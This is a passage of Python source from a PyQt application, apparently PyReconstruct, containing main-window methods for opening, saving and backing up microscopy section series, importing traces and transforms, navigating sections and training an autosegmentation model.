Series(new_series_fp, sections)\n new_series.modified = True\n new_series.jser_fp = jser_fp\n else:\n # remove the folder if not needed\n for f in os.listdir(hidden_series_dir):\n os.remove(os.path.join(hidden_series_dir, f))\n os.rmdir(hidden_series_dir)\n else:\n # remove the folder if no series file detected\n for f in os.listdir(hidden_series_dir):\n os.remove(os.path.join(hidden_series_dir, f))\n os.rmdir(hidden_series_dir)\n\n # open the JSER file if no unsaved series was opened\n if not new_series:\n new_series = Series.openJser(jser_fp)\n # user pressed cancel\n if new_series is None:\n if self.series is None:\n exit()\n else:\n return\n \n # clear the current series\n if self.series and not self.series.isWelcomeSeries():\n self.series.close()\n\n self.series = new_series\n\n # series has already been provided by other function\n else:\n self.series = series_obj\n \n # set the title of the main window\n self.seriesModified(self.series.modified)\n\n # set the explorer filepath\n if not self.series.isWelcomeSeries():\n settings = QSettings(\"KHLab\", \"PyReconstruct\")\n settings.setValue(\"last_folder\", os.path.dirname(self.series.jser_fp))\n\n # create field\n if self.field is not None: # close previous field widget\n self.field.createField(self.series)\n else:\n self.field = FieldWidget(self.series, self)\n self.setCentralWidget(self.field)\n\n # create mouse palette\n if self.mouse_palette: # close previous mouse dock\n self.mouse_palette.reset()\n else:\n self.mouse_palette = MousePalette(self)\n self.createPaletteShortcuts()\n palette_group, index = tuple(self.series.palette_index)\n self.changeTracingTrace(\n self.series.palette_traces[palette_group][index]\n ) # set the current trace\n\n # ensure that images are found\n if not self.field.section_layer.image_found:\n # check jser directory\n src_path = os.path.join(\n os.path.dirname(self.series.jser_fp),\n os.path.basename(self.field.section.src)\n )\n images_found = os.path.isfile(src_path)\n \n if images_found:\n self.changeSrcDir(src_path)\n else:\n self.changeSrcDir(notify=True)\n # prompt user to scale zarr images if not scaled\n elif (self.field.section_layer.image_found and \n self.field.section_layer.is_zarr_file and\n not self.field.section_layer.is_scaled):\n reply = QMessageBox.question(\n self,\n \"Zarr Scaling\",\n \"Zarr file not scaled.\\nWould you like to update the zarr with scales?\",\n QMessageBox.Yes,\n QMessageBox.No\n )\n if reply == QMessageBox.Yes:\n self.srcToZarr(create_new=False)\n \n # set the user for the series\n self.series.user = self.user\n \n def newSeries(\n self,\n image_locations : list = None,\n series_name : str = None,\n mag : float = None,\n thickness : float = None,\n from_zarr : bool = False\n ):\n \"\"\"Create a new series from a set of images.\n \n Params:\n image_locations (list): the filepaths for the section images.\n \"\"\"\n # get images from user\n if not image_locations:\n if from_zarr:\n valid_zarr = False\n while not valid_zarr:\n zarr_fp = FileDialog.get(\n \"dir\",\n self,\n \"Select Zarr\"\n )\n if not zarr_fp: return\n \n # get the image names in the zarr\n if \"scale_1\" in os.listdir(zarr_fp):\n valid_zarr = True\n image_locations = []\n for f in os.listdir(os.path.join(zarr_fp, \"scale_1\")):\n if not f.startswith(\".\"):\n image_locations.append(os.path.join(zarr_fp, \"scale_1\", f))\n else:\n notify(\"Please select a valid zarr file.\") \n else:\n image_locations = FileDialog.get(\n \"files\",\n self,\n \"Select Images\",\n filter=\"*.jpg *.jpeg *.png *.tif 
*.tiff *.bmp\"\n )\n if len(image_locations) == 0: return\n \n # get the name of the series from user\n if series_name is None:\n series_name, confirmed = QInputDialog.getText(\n self, \"New Series\", \"Enter series name:\")\n if not confirmed:\n return\n # get calibration (microns per pix) from user\n if mag is None:\n mag, confirmed = QInputDialog.getDouble(\n self, \"New Series\", \"Enter image calibration (μm/px):\",\n 0.00254, minValue=0.000001, decimals=6)\n if not confirmed:\n return\n # get section thickness (microns) from user\n if thickness is None:\n thickness, confirmed = QInputDialog.getDouble(\n self, \"New Series\", \"Enter section thickness (μm):\",\n 0.05, minValue=0.000001, decimals=6)\n if not confirmed:\n return\n \n # save and clear the existing backend series\n self.saveToJser(notify=True, close=True)\n \n # create new series\n series = Series.new(sorted(image_locations), series_name, mag, thickness)\n \n # open series after creating\n self.openSeries(series)\n\n # prompt the user to save the series\n self.saveAsToJser()\n \n def newFromXML(self, series_fp : str = None):\n \"\"\"Create a new series from a set of XML files.\n \n Params:\n series_fp (str): the filepath for the XML series\n \"\"\"\n\n # get xml series filepath from the user\n if not series_fp:\n series_fp = FileDialog.get(\n \"file\",\n self,\n \"Select XML Series\",\n filter=\"*.ser\"\n )\n if not series_fp: return # exit function if user does not provide series\n\n # save and clear the existing backend series\n self.saveToJser(notify=True, close=True)\n \n # convert the series\n series = xmlToJSON(os.path.dirname(series_fp))\n if not series:\n return\n\n # open the series\n self.openSeries(series)\n\n # prompt the user the save the series\n self.saveAsToJser()\n \n def exportToXML(self, export_fp : str = None):\n \"\"\"Export the current series to XML.\n \n Params:\n export_fp (str): the filepath for the XML .ser file\n \"\"\"\n # save the current data\n self.saveAllData()\n\n # get the new xml series filepath from the user\n if not export_fp:\n export_fp = FileDialog.get(\n \"save\",\n self,\n \"Export Series\",\n file_name=f\"{self.series.name}.ser\",\n filter=\"XML Series (*.ser)\"\n )\n if not export_fp: return False\n \n # convert the series\n jsonToXML(self.series, os.path.dirname(export_fp))\n \n def seriesModified(self, modified=True):\n \"\"\"Change the title of the window reflect modifications.\"\"\"\n # check for welcome series\n if self.series.isWelcomeSeries():\n self.setWindowTitle(\"PyReconstruct\")\n return\n \n if modified:\n self.setWindowTitle(self.series.name + \"*\")\n else:\n self.setWindowTitle(self.series.name)\n self.series.modified = modified\n \n def importTransforms(self, tforms_fp : str = None):\n \"\"\"Import transforms from a text file.\n \n Params:\n tforms_file (str): the filepath for the transforms file\n \"\"\"\n self.saveAllData()\n # get file from user\n if tforms_fp is None:\n tforms_fp = FileDialog.get(\n \"file\",\n self,\n \"Select file containing transforms\"\n )\n if not tforms_fp: return\n\n if not noUndoWarning():\n return\n \n # import the transforms\n importTransforms(self.series, tforms_fp)\n \n # reload the section\n self.field.reload()\n\n notify(\"Transforms imported successfully.\")\n\n def importSwiftTransforms(self, swift_fp=None):\n \"\"\"Import transforms from a text file.\n \n Params:\n swift_fp (str): the filepath for the transforms file\n \"\"\"\n\n self.saveAllData()\n \n # get file from user\n if not swift_fp:\n swift_fp = 
FileDialog.get(\"file\", self, \"Select SWiFT project file\")\n \n if not swift_fp:\n return\n\n # get scales from the swift project file\n with open(swift_fp, \"r\") as fp: swift_json = json.load(fp)\n\n scale_names = swift_json.get(\"level_data\")\n\n if scale_names: # new swift project file formatting\n \n scale_names = list(swift_json[\"level_data\"].keys())\n scales_available = [int(scale[1:]) for scale in scale_names]\n\n else: # old swift project file formatting\n\n scales_data = swift_json[\"data\"][\"scales\"]\n scale_names = list(scales_data.keys())\n scales_available = [int(scale[6:]) for scale in scale_names]\n\n scales_available.sort()\n \n print(f'Available SWiFT project scales: {scales_available}')\n\n structure = [\n [\"Scale:\", (True, \"combo\", [str(s) for s in scales_available])],\n [(\"check\", (\"Includes cal grid\", False))]\n ]\n\n response, confirmed = QuickDialog.get(self, structure, \"Import SWiFT Transforms\")\n if not confirmed:\n return\n scale = response[0]\n cal_grid = response[1][0][1]\n\n # import transforms\n print(f'Importing SWiFT transforms at scale {scale}...')\n if cal_grid: print('Cal grid included in series')\n importSwiftTransforms(self.series, swift_fp, scale, cal_grid)\n \n self.field.reload()\n\n notify(\"Transforms imported successfully.\")\n \n def importTraces(self, jser_fp : str = None):\n \"\"\"Import traces from another jser series.\n \n Params:\n jser_fp (str): the filepath with the series to import data from\n \"\"\"\n if jser_fp is None:\n structure = [\n [\"Series:\", (True, \"file\", \"\", \"*.jser\")],\n [\"Object regex filters (separate with a comma and space):\"],\n [(\"text\", \"\")],\n [\n \"From section\",\n (\"int\", min(self.series.sections.keys())),\n \"to\",\n (\"int\", max(self.series.sections.keys()))\n ]\n ]\n response, confirmed = QuickDialog.get(self, structure, \"Import Traces\")\n if not confirmed:\n return\n \n jser_fp = response[0]\n if response[1]:\n regex_filters = response[1].split(\", \")\n else:\n regex_filters = []\n sections = tuple(range(response[2], response[3]+1))\n else:\n sections = self.series.sections.keys()\n regex_filters = []\n\n if not jser_fp: return # exit function if user does not provide series\n\n self.saveAllData()\n\n if not noUndoWarning():\n return\n\n # open the other series\n o_series = Series.openJser(jser_fp)\n\n # import the traces and close the other series\n self.series.importTraces(o_series, sections, regex_filters)\n o_series.close()\n\n # reload the field to update the traces\n self.field.reload()\n\n # refresh the object list if needed\n if self.field.obj_table_manager:\n self.field.obj_table_manager.refresh()\n else:\n self.series.data.refresh()\n \n notify(\"Traces imported successfully.\")\n \n def importZtraces(self, jser_fp : str = None):\n \"\"\"Import ztraces from another jser series.\n \n Params:\n jser_fp (str): the filepath with the series to import data from\n \"\"\"\n regex_filters = []\n if jser_fp is None:\n structure = [\n [\"Series:\", (True, \"file\", \"\", \"*.jser\")],\n [\"Ztrace regex filters (separate with a comma and space):\"],\n [(\"text\", \"\")]\n ]\n response, confirmed = QuickDialog.get(self, structure, \"Import Ztraces\")\n if not confirmed:\n return\n jser_fp = response[0]\n if response[1]:\n regex_filters = response[1].split(\", \")\n\n self.saveAllData()\n\n if not noUndoWarning():\n return\n\n # open the other series\n o_series = Series.openJser(jser_fp)\n\n # import the ztraces and close the other series\n self.series.importZtraces(o_series, 
regex_filters)\n o_series.close()\n\n # reload the field to update the ztraces\n self.field.reload()\n\n # refresh the ztrace list if needed\n if self.field.ztrace_table_manager:\n self.field.ztrace_table_manager.refresh()\n \n notify(\"Ztraces imported successfully.\")\n \n def importTracePalette(self, jser_fp : str = None):\n \"\"\"Import the trace palette from another series.\n \n Params:\n jser_fp (str): the filepath with the series to import data from\n \"\"\"\n if jser_fp is None:\n jser_fp = FileDialog.get(\n \"file\",\n self,\n \"Select Series\",\n filter=\"*.jser\"\n )\n if not jser_fp: return # exit function if user does not provide series\n\n self.saveAllData()\n\n if not noUndoWarning():\n return\n\n # open the other series\n o_series = Series.openJser(jser_fp)\n\n # import the trace palette\n self.series.importPalettes(o_series)\n self.saveAllData()\n\n o_series.close()\n\n notify(\"Trace palette(s) imported successfully.\")\n \n def importSeriesTransforms(self, jser_fp : str = None):\n \"\"\"Import the trace palette from another series.\n \n Params:\n jser_fp (str): the filepath with the series to import data from\n \"\"\"\n if jser_fp is None:\n jser_fp = FileDialog.get(\n \"file\",\n self,\n \"Select Series\",\n filter=\"*.jser\"\n )\n if not jser_fp: return # exit function if user does not provide series\n\n self.saveAllData()\n\n if not noUndoWarning():\n return\n\n # open the other series\n o_series = Series.openJser(jser_fp)\n\n # preliminary sections check\n self_sections = sorted(list(self.series.sections.keys()))\n other_sections = sorted(list(o_series.sections.keys()))\n if self_sections != other_sections:\n return\n \n # get a list of alignments from the other series\n o_alignments = list(o_series.data[\"sections\"][other_sections[0]][\"tforms\"].keys())\n s_alignments = list(self.series.data[\"sections\"][other_sections[0]][\"tforms\"].keys())\n\n # prompt the user to choose an alignment\n structure = [\n [(\n \"check\",\n *((a, False) for a in o_alignments)\n )]\n ]\n response, confirmed = QuickDialog.get(self, structure, \"Import Transforms\")\n if not confirmed:\n o_series.close()\n return\n \n chosen_alignments = [a for a, was_chosen in response[0] if was_chosen]\n if not chosen_alignments:\n o_series.close()\n return\n\n overlap_alignments = []\n for a in chosen_alignments:\n if a in s_alignments:\n overlap_alignments.append(a)\n \n if overlap_alignments:\n overlap_str = \", \".join(overlap_alignments)\n reply = QMessageBox.question(\n self,\n \"Import Alignments\",\n f\"The alignments {overlap_str} exist in your series.\\nWould you like to overwrite them?\",\n QMessageBox.Yes,\n QMessageBox.No\n )\n if reply == QMessageBox.No:\n notify(\"Import transforms canceled.\")\n o_series.close()\n return\n \n self.series.importTransforms(o_series, chosen_alignments)\n o_series.close()\n \n self.field.reload()\n self.seriesModified()\n\n notify(\"Transforms imported successfully.\")\n \n def importBC(self, jser_fp : str = None):\n \"\"\"Import the brightness/contrast settings from another jser series.\n \n Params:\n jser_fp (str): the filepath with the series to import data from\n \"\"\"\n sections = list(self.series.sections.keys())\n if jser_fp is None:\n structure = [\n [\"Series:\", (True, \"file\", \"\", \"*.jser\")],\n [\n \"From section\",\n (\"int\", min(self.series.sections.keys())),\n \"to\",\n (\"int\", max(self.series.sections.keys()))\n ]\n ]\n response, confirmed = QuickDialog.get(self, structure, \"Import Brightness/Contrast\")\n if not confirmed:\n 
return\n \n jser_fp = response[0]\n sections = tuple(range(response[1], response[2]+1))\n \n if not jser_fp: return # exit function if user does not provide series\n\n self.saveAllData()\n\n # open the other series\n o_series = Series.openJser(jser_fp)\n\n # import the traces and close the other series\n self.series.importBC(o_series, sections)\n o_series.close()\n\n # reload the field to update the traces\n self.field.reload()\n\n # refresh the object list if needed\n if self.field.section_table_manager:\n self.field.section_table_manager.refresh()\n\n notify(\"Brightness/contrast settings imported successfully.\")\n \n def importFlags(self, jser_fp : str = None):\n \"\"\"Import flags from another series.\"\"\"\n if jser_fp is None:\n jser_fp = FileDialog.get(\n \"file\",\n self,\n \"Select Series\",\n filter=\"*.jser\"\n )\n if not jser_fp: return # exit function if user does not provide series\n\n self.saveAllData()\n\n if not noUndoWarning():\n return\n\n # open the other series\n o_series = Series.openJser(jser_fp)\n\n # import the flags\n self.series.importFlags(o_series)\n self.field.reload()\n\n o_series.close()\n\n notify(\"Flags imported successfully.\")\n \n def editImage(self, option : str, direction : str, log_event=True):\n \"\"\"Edit the brightness or contrast of the image.\n \n Params:\n option (str): brightness or contrast\n direction (str): up or down\n \"\"\"\n if option == \"brightness\" and direction == \"up\":\n self.field.changeBrightness(1)\n elif option == \"brightness\" and direction == \"down\":\n self.field.changeBrightness(-1)\n elif option == \"contrast\" and direction == \"up\":\n self.field.changeContrast(2)\n elif option == \"contrast\" and direction == \"down\":\n self.field.changeContrast(-2)\n self.mouse_palette.updateBC()\n \n def changeMouseMode(self, new_mode):\n \"\"\"Change the mouse mode of the field (pointer, panzoom, tracing...).\n\n Called when user clicks on mouse mode palette.\n\n Params:\n new_mode: the new mouse mode to set\n \"\"\"\n self.field.setMouseMode(new_mode)\n \n def changeClosedTraceMode(self, new_mode=None):\n \"\"\"Change the closed trace mode (trace, rectangle, circle).\"\"\"\n if new_mode not in [\"trace\", \"rect\", \"circle\"]:\n current_mode = self.field.closed_trace_mode\n structure = [\n [(\"radio\",\n (\"Trace\", current_mode == \"trace\"),\n (\"Rectangle\", current_mode == \"rect\"),\n (\"Ellipse\", current_mode == \"circle\")\n )],\n [(\"check\", (\"Automatically merge selected traces\", self.series.options[\"auto_merge\"]))]\n ]\n response, confirmed = QuickDialog.get(self, structure, \"Closed Trace Mode\")\n if not confirmed:\n return\n \n if response[0][1][1]:\n new_mode = \"rect\"\n elif response[0][2][1]:\n new_mode = \"circle\"\n else:\n new_mode = \"trace\"\n \n self.series.options[\"auto_merge\"] = response[1][0][1]\n \n self.field.closed_trace_mode = new_mode\n\n def changeTracingTrace(self, trace):\n \"\"\"Change the trace utilized by the user.\n\n Called when user clicks on trace palette.\n\n Params:\n trace: the new tracing trace to set\n \"\"\"\n self.field.setTracingTrace(trace)\n \n def changeSection(self, section_num : int = None, save=True):\n \"\"\"Change the section of the field.\n \n Params:\n section_num (int): the section number to change to\n save (bool): saves data to files if True\n \"\"\"\n if section_num is None:\n section_num, confirmed = QInputDialog.getText(\n self, \"Go To Section\", \"Enter the desired section number:\", text=str(self.series.current_section))\n if not confirmed:\n 
return\n try:\n section_num = int(section_num)\n except ValueError:\n return\n \n # end the field pending events\n self.field.endPendingEvents()\n # save data\n if save:\n self.saveAllData()\n # change the field section\n self.field.changeSection(section_num)\n # update status bar\n self.field.updateStatusBar()\n # update the mouse palette\n self.mouse_palette.updateBC()\n \n def flickerSections(self):\n \"\"\"Switch between the current and b sections.\"\"\"\n if self.field.b_section:\n self.changeSection(self.field.b_section.n, save=False)\n \n def incrementSection(self, down=False):\n \"\"\"Increment the section number by one.\n \n Params:\n down (bool): the direction to move\n \"\"\"\n section_numbers = sorted(list(self.series.sections.keys())) # get list of all section numbers\n section_number_i = section_numbers.index(self.series.current_section) # get index of current section number in list\n if down:\n if section_number_i > 0:\n self.changeSection(section_numbers[section_number_i - 1]) \n else: \n if section_number_i < len(section_numbers) - 1:\n self.changeSection(section_numbers[section_number_i + 1]) \n \n def wheelEvent(self, event):\n \"\"\"Called when mouse scroll is used.\"\"\"\n # do nothing if middle button is clicked\n if self.field.mclick:\n return\n \n modifiers = QApplication.keyboardModifiers()\n\n # if zooming\n if modifiers == Qt.ControlModifier:\n self.activateWindow()\n field_cursor = self.field.cursor()\n p = self.field.mapFromGlobal(field_cursor.pos())\n x, y = p.x(), p.y()\n if not self.is_zooming:\n # check if user just started zooming in\n self.field.panzoomPress(x, y)\n self.zoom_factor = 1\n self.is_zooming = True\n\n if event.angleDelta().y() > 0: # if scroll up\n self.zoom_factor *= 1.1\n elif event.angleDelta().y() < 0: # if scroll down\n self.zoom_factor *= 0.9\n self.field.panzoomMove(zoom_factor=self.zoom_factor)\n \n # if changing sections\n elif modifiers == Qt.NoModifier:\n # check for the position of the mouse\n mouse_pos = event.point(0).pos()\n field_geom = self.field.geometry()\n if not field_geom.contains(mouse_pos.x(), mouse_pos.y()):\n return\n # change the section\n if event.angleDelta().y() > 0: # if scroll up\n self.incrementSection()\n elif event.angleDelta().y() < 0: # if scroll down\n self.incrementSection(down=True)\n \n def keyReleaseEvent(self, event):\n \"\"\"Overwritten: checks for Ctrl+Zoom.\"\"\"\n if self.is_zooming and event.key() == 16777249:\n self.field.panzoomRelease(zoom_factor=self.zoom_factor)\n self.is_zooming = False\n \n super().keyReleaseEvent(event)\n \n def saveAllData(self):\n \"\"\"Write current series and section data into backend JSON files.\"\"\"\n if self.series.isWelcomeSeries():\n return\n # # save the trace palette\n # self.series.palette_traces = []\n # for button in self.mouse_palette.palette_buttons: # get trace palette\n # self.series.palette_traces.append(button.trace)\n # if button.isChecked():\n # self.series.current_trace = button.trace\n self.field.section.save(update_series_data=False)\n self.series.save()\n \n def saveToJser(self, notify=False, close=False):\n \"\"\"Save all data to JSER file.\n \n Params:\n save_data (bool): True if series and section files in backend should be save\n close (bool): Deletes backend series if True\n \"\"\"\n # save the series data\n self.saveAllData()\n\n # if welcome series -> close without saving\n if self.series.isWelcomeSeries():\n return\n \n # notify the user and check if series was modified\n if notify and self.series.modified:\n save = saveNotify()\n if 
save == \"no\":\n if close:\n self.series.close()\n return\n elif save == \"cancel\":\n return \"cancel\"\n \n # check if the user is closing and the series was not modified\n if close and not self.series.modified:\n self.series.close()\n return\n\n # run save as if there is no jser filepath\n if not self.series.jser_fp:\n self.saveAsToJser(close=close)\n else: \n self.series.saveJser(close=close)\n \n # set the series to unmodified\n self.seriesModified(False)\n \n def saveAsToJser(self, close=False):\n \"\"\"Prompt the user to find a save location.\"\"\"\n # save the series data\n self.saveAllData()\n\n # check for wlecome series\n if self.series.isWelcomeSeries():\n return\n\n # get location from user\n new_jser_fp = FileDialog.get(\n \"save\",\n self,\n \"Save Series\",\n filter=\"*.jser\",\n file_name=f\"{self.series.name}.jser\"\n )\n if not new_jser_fp: return\n \n # move the working hidden folder to the new jser directory\n self.series.move(\n new_jser_fp,\n self.field.section,\n self.field.b_section\n )\n \n # save the file\n self.series.saveJser(close=close)\n\n # set the series to unmodified\n self.seriesModified(False)\n \n def autoBackup(self):\n \"\"\"Set up the auto-backup functionality for the series.\"\"\"\n # user checked the option\n if self.backup_act.isChecked():\n # prompt the user to find a folder to store backups\n new_dir = FileDialog.get(\n \"dir\",\n self,\n \"Select folder to contain backup files\",\n )\n if not new_dir:\n self.backup_act.setChecked(False)\n return\n self.series.options[\"backup_dir\"] = new_dir\n # user unchecked the option\n else:\n self.series.options[\"backup_dir\"] = \"\"\n \n self.seriesModified()\n \n def manualBackup(self):\n \"\"\"Back up the series to a specified location.\"\"\"\n self.saveAllData()\n d = datetime.now().strftime('%Y%m%d')\n series_basename = f\"{self.series.name}-{d}-{self.series.user}.jser\"\n\n backup_fp = FileDialog.get(\n \"save\",\n self,\n \"Backup Series\",\n file_name=series_basename,\n filter=\"Series file (*.jser)\"\n )\n if not backup_fp: return\n \n self.series.saveJser(save_fp=backup_fp)\n \n def viewSeriesHistory(self):\n \"\"\"View the history for the entire series.\"\"\"\n HistoryTableWidget(self.series.getFullHistory(), self)\n \n def openObjectList(self):\n \"\"\"Open the object list widget.\"\"\"\n self.saveAllData()\n self.field.openObjectList()\n \n def openZtraceList(self):\n \"\"\"Open the ztrace list widget.\"\"\"\n self.saveAllData()\n self.field.openZtraceList()\n \n def openFlagList(self):\n \"\"\"Open the flag widget.\"\"\"\n self.saveAllData()\n self.field.openFlagList()\n \n def toggleZtraces(self):\n \"\"\"Toggle whether ztraces are shown.\"\"\"\n self.field.deselectAllTraces()\n self.series.options[\"show_ztraces\"] = not self.series.options[\"show_ztraces\"]\n self.field.generateView(generate_image=False)\n \n def openTraceList(self):\n \"\"\"Open the trace list widget.\"\"\"\n self.field.openTraceList()\n \n def openSectionList(self):\n \"\"\"Open the section list widget.\"\"\"\n self.saveAllData()\n self.field.openSectionList()\n \n def setToObject(self, obj_name : str, section_num : int):\n \"\"\"Focus the field on an object from a specified section.\n \n Params:\n obj_name (str): the name of the object\n section_num (int): the section the object is located\n \"\"\"\n if obj_name is not None and section_num is not None:\n self.changeSection(section_num)\n self.field.findContour(obj_name)\n \n def setToFlag(self, snum : int, flag : Flag):\n \"\"\"Focus the field on a flag.\n \n 
Params:\n snum (int): the section number\n flag (Flag): the flag\n \"\"\"\n if snum is not None and flag is not None:\n self.changeSection(snum)\n self.field.findFlag(flag)\n \n def findObjectFirst(self, obj_name=None):\n \"\"\"Find the first or last contour in the series.\n \n Params:\n obj_name (str): the name of the object to find\n \"\"\"\n if obj_name is None:\n obj_name, confirmed = QInputDialog.getText(\n self,\n \"Find Object\",\n \"Enter the object name:\",\n )\n if not confirmed:\n return\n\n # find the contour\n self.setToObject(obj_name, self.series.data.getStart(obj_name))\n \n def changeTform(self, new_tform_list : list = None):\n \"\"\"Open a dialog to change the transform of a section.\"\"\"\n # check for section locked status\n if self.field.section.align_locked:\n return\n \n if new_tform_list is None:\n current_tform = \" \".join(\n [str(round(n, 5)) for n in self.field.section.tform.getList()]\n )\n new_tform_list, confirmed = QInputDialog.getText(\n self, \"New Transform\", \"Enter the desired section transform:\", text=current_tform)\n if not confirmed:\n return\n try:\n new_tform_list = [float(n) for n in new_tform_list.split()]\n if len(new_tform_list) != 6:\n return\n except ValueError:\n return\n self.field.changeTform(Transform(new_tform_list))\n \n def translate(self, direction : str, amount : str):\n \"\"\"Translate the current transform.\n \n Params:\n direction (str): left, right, up, or down\n amount (str): small, med, or big\n \"\"\"\n if amount == \"small\":\n num = self.series.options[\"small_dist\"]\n elif amount == \"med\":\n num = self.series.options[\"med_dist\"]\n elif amount == \"big\":\n num = self.series.options[\"big_dist\"]\n if direction == \"left\":\n x, y = -num, 0\n elif direction == \"right\":\n x, y = num, 0\n elif direction == \"up\":\n x, y = 0, num\n elif direction == \"down\":\n x, y = 0, -num\n self.field.translate(x, y)\n \n def newAlignment(self, new_alignment_name : str):\n \"\"\"Add a new alignment (based on existing alignment).\n \n Params:\n new_alignment_name (str): the name of the new alignment\n \"\"\"\n if new_alignment_name in self.field.section.tforms:\n QMessageBox.information(\n self,\n \" \",\n \"This alignment already exists.\",\n QMessageBox.Ok\n )\n return\n self.series.newAlignment(\n new_alignment_name,\n self.series.alignment\n )\n \n def changeAlignment(self):\n \"\"\"Open dialog to modify and change alignments.\n \n Params:\n alignment_name (str): the name of the alignment ro switch to\n \"\"\"\n self.saveAllData()\n \n alignments = list(self.field.section.tforms.keys())\n\n response, confirmed = AlignmentDialog(\n self,\n alignments,\n self.series.alignment\n ).exec()\n if not confirmed:\n return\n \n alignment_name, alignment_dict = response\n\n modified = False\n if alignment_dict:\n for k, v in alignment_dict.items():\n if k != v:\n modified = True\n break\n if modified:\n self.series.modifyAlignments(alignment_dict)\n self.field.reload()\n \n if alignment_name:\n self.field.changeAlignment(alignment_name)\n elif modified:\n self.field.changeAlignment(self.series.alignment)\n \n def calibrateMag(self, trace_lengths : dict = None):\n \"\"\"Calibrate the pixel size for the series.\n \n Params:\n trace_lengths (dict): the lengths of traces to calibrate\n \"\"\"\n self.saveAllData()\n \n if trace_lengths is None:\n # gather trace names\n names = []\n for trace in self.field.section.selected_traces:\n if trace.name not in names:\n names.append(trace.name)\n \n if len(names) == 0:\n notify(\"Please select traces 
for calibration.\")\n \n # prompt user for length of each trace name\n trace_lengths = {}\n for name in names:\n d, confirmed = QInputDialog.getText(\n self,\n \"Trace Length\",\n f'Length of \"{name}\" in microns:'\n )\n if not confirmed:\n return\n try:\n d = float(d)\n except ValueError:\n return\n trace_lengths[name] = d\n \n self.field.calibrateMag(trace_lengths)\n \n def modifyPointer(self, event=None):\n \"\"\"Modify the pointer properties.\"\"\"\n s, t = self.series.options[\"pointer\"]\n structure = [\n [\"Shape:\"],\n [(\"radio\", (\"Rectangle\", s==\"rect\"), (\"Lasso\", s==\"lasso\"))],\n [\"Type:\"],\n [(\"radio\", (\"Include intersected traces\", t==\"inc\"), (\"Exclude intersected traces\", t==\"exc\"))]\n ]\n response, confirmed = QuickDialog.get(self, structure, \"Pointer Settings\")\n if not confirmed:\n return\n \n s = \"rect\" if response[0][0][1] else \"lasso\"\n t = \"inc\" if response[1][0][1] else \"exc\"\n self.series.options[\"pointer\"] = s, t\n self.seriesModified()\n \n def modifyGrid(self, event=None):\n \"\"\"Modify the grid properties.\"\"\"\n response, confirmed = GridDialog(\n self,\n tuple(self.series.options[\"grid\"])\n ).exec()\n if not confirmed:\n return\n \n self.series.options[\"grid\"] = response\n self.seriesModified()\n \n def modifyKnife(self, event=None):\n \"\"\"Modify the knife properties.\"\"\"\n structure = [\n [\"When using the knife, objects smaller than this percent\"],\n [\"of the original trace area will be automatically deleted.\"],\n [\"Knife delete threshold (%):\", (\"float\", self.series.options[\"knife_del_threshold\"], (0, 100))]\n ]\n response, confirmed = QuickDialog.get(self, structure, \"Knife\")\n if not confirmed:\n return\n \n self.series.options[\"knife_del_threshold\"] = response[0]\n self.seriesModified()\n \n def resetTracePalette(self):\n \"\"\"Reset the trace palette to default traces.\"\"\"\n self.mouse_palette.resetPalette()\n self.saveAllData()\n self.seriesModified()\n \n def setZarrLayer(self, zarr_dir=None):\n \"\"\"Set a zarr layer.\"\"\"\n if not zarr_dir:\n zarr_dir = FileDialog.get(\n \"dir\",\n self,\n \"Select overlay zarr\",\n )\n if not zarr_dir: return\n\n self.series.zarr_overlay_fp = zarr_dir\n self.series.zarr_overlay_group = None\n\n groups = []\n for g in os.listdir(zarr_dir):\n if os.path.isdir(os.path.join(zarr_dir, g)):\n groups.append(g)\n\n self.zarr_palette = ZarrPalette(groups, self)\n \n def setLayerGroup(self, group_name):\n \"\"\"Set the specific group displayed in the zarr layer.\"\"\"\n if not group_name:\n group_name = None\n if self.zarr_palette.cb.currentText != group_name:\n self.zarr_palette.cb.setCurrentText(group_name)\n self.series.zarr_overlay_group = group_name\n self.field.createZarrLayer()\n self.field.generateView()\n \n def removeZarrLayer(self):\n \"\"\"Remove an existing zarr layer.\"\"\"\n self.series.zarr_overlay_fp = None\n self.series.zarr_overlay_group = None\n if self.zarr_palette:\n self.zarr_palette.close()\n self.field.createZarrLayer()\n self.field.generateView()\n\n def exportToZarr(self):\n \"\"\"Set up an autosegmentation for a series.\n \n Params:\n run (str): \"train\" or \"segment\"\n \"\"\"\n self.saveAllData()\n self.removeZarrLayer()\n\n inputs, dialog_confirmed = CreateZarrDialog(self, self.series).exec()\n\n if not dialog_confirmed: return\n\n print(\"Making zarr directory...\")\n \n # export to zarr\n border_obj, srange, mag = inputs\n data_fp = seriesToZarr(\n self.series,\n border_obj,\n srange,\n mag\n )\n\n 
self.series.options[\"autoseg\"][\"zarr_current\"] = data_fp\n\n print(\"Zarr directory done.\")\n \n def train(self, retrain=False):\n \"\"\"Train an autosegmentation model.\"\"\"\n self.saveAllData()\n self.removeZarrLayer()\n\n model_paths = {\"a\":{\"b\":\"a/b/m.py\"}}\n\n opts = self.series.options[\"autoseg\"]\n\n response, confirmed = TrainDialog(self, self.series, model_paths, opts, retrain).exec()\n if not confirmed: return\n \n (data_fp, iterations, save_every, group, model_path, cdir, \\\n pre_cache, min_masked, downsample) = response\n\n training_opts = {\n 'zarr_current': data_fp,\n 'iters': iterations,\n 'save_every': save_every,\n 'group': group,\n 'model_path': model_path,\n 'checkpts_dir': cdir,\n 'pre_cache': pre_cache,\n 'min_masked': min_masked,\n 'downsample_bool': downsample\n }\n\n for k, v in training_opts.items():\n opts[k] = v\n self.seriesModified(True)\n\n print(\"Exporting labels to zarr directory...\")\n \n if retrain:\n group_name = f\"labels_{self.series.getRecentSegGroup()}_keep\"\n seriesToLabels(self.series, data_fp)\n \n else:\n group_name = f\"labels_{group}\"\n seriesToLabels(self.series, data_fp, group)\n\n print(\"Zarr directory updated with labels!\")\n\n if retrain: self.field.reload()\n if retrain and self.field.obj_table_manager:\n self.field.obj_table_manager.refresh()\n\n print(\"Starting training....\")\n\n print(\"Importing training modules...\")\n\n from autoseg import train, make_mask, model_paths\n\n make_mask(data_fp, group_name)\n \n sources = [{\n \"raw\" : (data_fp, \"raw\"),\n \"labels\" : (data_fp, group_name),\n \"unlabelled\" : (data_fp, \"unlabelled\")\n }]\n\n train(\n iterations=iterations,\n save_every=save_every,\n sources=sources,\n model_path=model_path,\n pre_cache=pre_cache,\n min_masked=min_masked,\n downsample=downsample,\n checkpoint_basename=os.path.join(cdir, \"model\") # where existing checkpoints\n )\n\n print(\"Done training!\")\n \n def markKeep(self):\n \"\"\"Add the selected trace to the most recent \"keep\" segmentation group.\"\"\"\n keep_tag = f\"{self.series.getRecentSegGroup()}_keep\"\n for trace in self.field.section.selected_traces:\n trace.addTag(keep_tag)\n # deselect traces and hide\n 